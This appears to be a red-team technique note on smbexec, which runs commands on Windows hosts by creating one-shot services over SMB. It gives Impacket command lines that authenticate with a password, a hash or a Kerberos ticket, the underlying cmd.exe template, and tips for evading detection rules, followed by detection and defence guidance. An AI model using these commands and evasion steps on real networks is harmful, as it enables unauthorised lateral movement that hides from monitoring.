SMB exec
TL;DR: SMB-exec drives the service-control pipe (
\PIPE\svcctl) over SMB to start a one-shot service that runs your command and pipes output back through a share — the no-binary-on-disk cousin of psexec-family.
What it is
Instead of uploading a service executable, smbexec registers a service whose binPath is a cmd.exe /Q /c invocation that writes output to a file on C$, then reads that file back over SMB. Each command spawns a new short-lived service, deletes the file, and tears the service down. No binary touches disk on the target, but services.exe → cmd.exe parent chains and 7045 events are still produced.
Preconditions / where it applies
- Local administrator on the target (service create requires
SC_MANAGER_CREATE_SERVICE). - 445/tcp reachable,
ADMIN$andC$enabled. - NTLM hash, Kerberos ticket, or password for an admin account.
cmd.exeavailable (default on every Windows install).
Technique
Impacket invocation:
1
2
3
4
5
6
# password
smbexec.py corp/admin:'Passw0rd!'@10.0.0.5
# hash
smbexec.py -hashes :<NThash> corp/admin@10.0.0.5
# kerberos / overpass-the-hash
smbexec.py -k -no-pass corp.local/admin@fs01
Under the hood, each typed command is wrapped roughly as:
1
%COMSPEC% /Q /c echo <cmd> ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
The service is then deleted and \\target\C$\__output is read for the result. Output is semi-interactive — fine for whoami, painful for powershell -nop (no persistent session). For a persistent shell use wmi-exec or winrm-exec instead.
The classic psexec cousin leaves an even louder fingerprint: the SysInternals binary writes PSEXESVC.exe to ADMIN$ and registers a service literally named PSEXESVC — a hard-coded string EDR vendors hunt for verbatim. Impacket’s psexec.py randomises the service name (-service-name) and the uploaded binary name, but the SMB write to ADMIN$\<random>.exe plus the 7045 service install pair is still distinctive. When you must use the service-based path, rename __output via -output-file, randomise the service via -service-name, and pre-stage the output file outside C$ root to dodge the default 5145 rule.
Detection and defence
- 7045 service install events with
binPathcontaining%COMSPEC%,/Q /c, orecho ... ^>— extremely high-signal for smbexec. - 5145 file-share events writing/reading
__output(default Impacket filename — operators rename it). services.exespawningcmd.exewith redirection to\\127.0.0.1\C$— Sysmon EID 1 query.- Defences: enforce SMB signing, restrict service-create to Tier-0, LAPS for local admin, EDR rules on
services.exe → cmd.exewith redirection.
References
- Impacket smbexec.py source — exact command template.
- smbexec writeup — HackTricks — flow diagram.
- Detecting Impacket smbexec — Red Canary — telemetry patterns.
- ired.team — Lateral movement with psexec —
PSEXESVCservice-name signature and SMB traffic detection notes.